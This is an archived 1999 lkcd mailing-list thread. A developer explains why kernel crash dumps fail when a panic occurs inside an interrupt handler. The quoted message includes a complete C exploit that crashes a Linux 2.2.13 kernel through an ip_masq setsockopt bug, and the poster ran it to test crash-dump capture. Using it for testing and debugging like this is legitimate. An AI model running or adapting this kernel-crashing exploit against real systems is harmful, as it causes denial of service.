lkcd
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: lkcd doesn't make a dump for this case

from [Matt Robinson] [Permanent Link][Original]
To: Brian Hall <brianw.hall@xxxxxxxxxx>
Subject: Re: lkcd doesn't make a dump for this case
From: Matt Robinson <yakker@xxxxxxxxxxxxxxxxxxxx>
Date: Mon, 6 Dec 1999 11:25:32 -0800 (PST)
Cc: lkcd@xxxxxxxxxxx
In-reply-to: <XFMail.19991207163634.brianw.hall@xxxxxxxxxx>
Reply-to: Matt Robinson <yakker@xxxxxxxxxxxxxxxxxxxx>
Sender: owner-lkcd@xxxxxxxxxxx 
Hi, Brian.

I'll run a few tests on this today.  Just an FYI, the reason why
ours and MCL's code doesn't work correctly is because you're panicing
in an interrupt handler, which means you're calling down() twice,
which inevitably breaks the crash dump process.  I have a set of code
which avoids this problem, but I'm not sure how to integrate it into
the kernel, since it is SCSI specific (again).

The real point is, if you try to use I/O interrupts to disk when you're
already locking out interrupts, you're not going to be able to dump data
to disk.  It's a problem we are working on.

I'll try out your code today and try to have feedback for you if not
today, then tomorrow.  Thanks!

--Matt

On Tue, 7 Dec 1999, Brian Hall wrote:
|>Today there was a post on the kernel list of a snippet of C code to crash to
|>2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header
|>names were slightly different for some reason), I ran it to test lkcd. The
|>system crashed so fast I could barely see what went on. Looked like several
|>oopses scrolled by, then the dreaded "killing interrupt handler" message. No
|>crash dump was generated. I have successfully created crash dumps on this
|>system via the tests described in the FAQ.
|>
|>My question is, will or can this be fixed in a future version of lkcd? I don't
|>mean specifically relative to this crash case, but in the general "killing
|>interrupt handler" case. Mission Critical Linux claimed they were going to fix
|>this same type of problem in a future version of their crash patch. As of now
|>they are about three weeks overdue on that.
|>
|>The code:
|>
|>/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */
|>
|>#include <stdio.h>
|>#include <linux/types.h>
|>#include <net/if.h>
|>#include <netinet/in.h>
|>#include <netinet/ip.h>
|>/*
|>#include <netinet/ip_tcp.h>
|>#include <netinet/ip_udp.h>
|>*/
|>#include <netinet/tcp.h>
|>#include <netinet/udp.h>
|>
|>#include <netinet/ip_icmp.h>
|>#include <linux/ip_fw.h>
|>#include <linux/ip_masq.h>
|>
|>int main()
|>{
|>        int sock;
|>        struct ip_masq_ctl mctl;
|>
|>        memset (&mctl, 0, sizeof (mctl));
|>        mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL;
|>        mctl.u.user.protocol = IPPROTO_UDP;
|>        if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
|>                perror ("socket"); exit (1);
|>        }
|>        if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof 
(mctl)))
|>                perror ("kab00m failed :) ");
|>        exit (0);
|>}
|>
|>--
|>Brian Hall <brianw.hall@xxxxxxxxxx>
|>Linux Consultant
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  lkcd doesn't make a dump for this case, Brian Hall
Next by Date:  Re: lkcd doesn't make a dump for this case, David Winchell
Previous by Thread:  lkcd doesn't make a dump for this case, Brian Hall
Next by Thread:  Re: lkcd doesn't make a dump for this case, David Winchell
Indexes:  [Date] [Thread] [Top] [All Lists]